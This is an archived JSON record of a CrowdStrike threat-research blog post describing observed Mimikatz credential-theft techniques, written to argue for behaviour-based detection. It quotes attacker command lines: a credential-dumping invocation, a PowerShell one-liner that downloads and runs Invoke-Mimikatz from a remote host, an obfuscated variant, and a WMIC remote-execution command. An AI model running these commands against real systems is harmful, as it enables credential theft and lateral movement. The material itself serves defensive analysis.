{
	"id": "114ad4cb-fef4-4ff7-b1c7-f98ec4700802",
	"created_at": "2026-04-06T00:09:52.223905Z",
	"updated_at": "2026-04-10T13:12:39.097089Z",
	"deleted_at": null,
	"sha1_hash": "c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5",
	"title": "Mimikatz Credential Theft Techniques | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 64425,
	"plain_text": "Mimikatz Credential Theft Techniques | CrowdStrike\r\nBy harlan.carvey\r\nArchived: 2026-04-05 20:18:58 UTC\r\nThis blog shares information on some examples of how the CrowdStrike® Falcon® OverWatch™ team has\r\nobserved the open-source tool known as Mimikatz being used in the wild – including an unusual use of the tool to\r\nstrictly bypass brittle signature-based detections. The OverWatch team has comprehensive levels of visibility into\r\nattempted attacks against our customers’ infrastructures, and that visibility is extended by the sheer breadth of our\r\ncustomer base. This means the OverWatch team is able to observe a wide range of adversary activity from the\r\nsystem visibility provided by the Falcon endpoint security platform.\r\nCredential Access for Privilege Escalation\r\nOne frequently observed aspect of adversary activity is credential access. Actors often seek out valid credentials in\r\norder to escalate their privileges and extend their reach within an infrastructure — and they do so via a variety of\r\nmeans. In fact, the OverWatch team has previously observed cases in which adversaries have employed multiple\r\ncredential theft techniques against a single victim. (An example of adversaries using multiple credential\r\ntechniques is included in the 2018 Falcon OverWatch Report.) One popular means of credential access is the use\r\nof Mimikatz, described as the “AK47 of cyber” by CrowdStrike Co-Founder and CTO Dmitri Alperovitch. 
The\r\nOverWatch team regularly sees Mimikatz used by both targeted adversaries and pen testers.\r\nChanging the Executable Name\r\nThe simplest and most direct technique for using this tool is for the actor to copy it to a compromised system,\r\nchange the name of the executable and launch it using, for example, the following command line:\r\nc:\\ProgramData\\p.exe \"privilege::debug\" \"sekurlsa::logonpasswords\"\r\nThis allows the actor to access\r\ncredential information on a system.\r\nUsing a Batch File\r\nOther means of launching this tool that have been observed include using a batch file to copy the tool over to\r\ntarget systems; launching the tool and sending the output to a file; copying the output files back to a central\r\ncollection point; and finally, deleting all relevant files from the target systems.\r\nUsing a PowerShell Variant\r\nAnother means of gaining access to credential information that OverWatch analysts have observed is the use of a\r\nPowerShell variant of Mimikatz, as seen in the following example: powershell -ep Bypass -NoP -NonI -NoLogo\r\n-c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent\u003c.\u003ecom//Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa :: logonpasswords exit'\r\nChanging Command Line Options\r\nDuring the last quarter of 2018, OverWatch analysts observed a different use of the Mimikatz tool, specifically\r\none that appears to have been modified to change the command line options. 
It appears as follows: mnl.exe pr::dg sl ::lp et -p\r\nThis specific variant of Mimikatz was run against multiple target systems through the use\r\nof WMIC.exe, as illustrated below: Wmic /NODE:\"\" /USER:\"\" /password: process call create \"cmd.exe /c\r\n(c:\\windows\\security\\mnl.exe pr::dg sl ::lp et -p \u003ec:\\windows\\security\\PList.txt) \u003e\u003e\r\nc:\\windows\\temp\\temp.txt\"\r\nMonitoring for IOAs Is Crucial\r\nThese techniques are clearly an attempt to evade brittle detection approaches that rely only on looking at\r\ncommand line options of the executable to infer its purpose, or on checking for the presence of relevant strings in the\r\nbinary file. While there are a number of techniques that actors can employ to access credential information, the\r\nFalcon platform provides a level of visibility that allows defenders to see new techniques being used, even when\r\nthose techniques are specifically aimed at evading or subverting detection mechanisms. This further demonstrates\r\nthe value of monitoring for indicators of attack (IOAs), which focus on behavioral aspects of attacker techniques,\r\nrather than focusing only on typical indicators of compromise (IOCs), such as file names, hashes or single\r\ncommand line options.\r\nAdditional Resources\r\nDownload the 2020 CrowdStrike Global Threat Report\r\nDownload the 2018 CrowdStrike Falcon® OverWatch Report.\r\nTest CrowdStrike next-gen AV for yourself: Start your free trial of Falcon Prevent™ today.\r\nSource: https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/"
	],
	"report_names": [
		"credential-theft-mimikatz-techniques"
	],
	"threat_actors": [],
	"ts_created_at": 1775434192,
	"ts_updated_at": 1775826759,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5.pdf",
		"text": "https://archive.orkl.eu/c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5.txt",
		"img": "https://archive.orkl.eu/c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5.jpg"
	}
}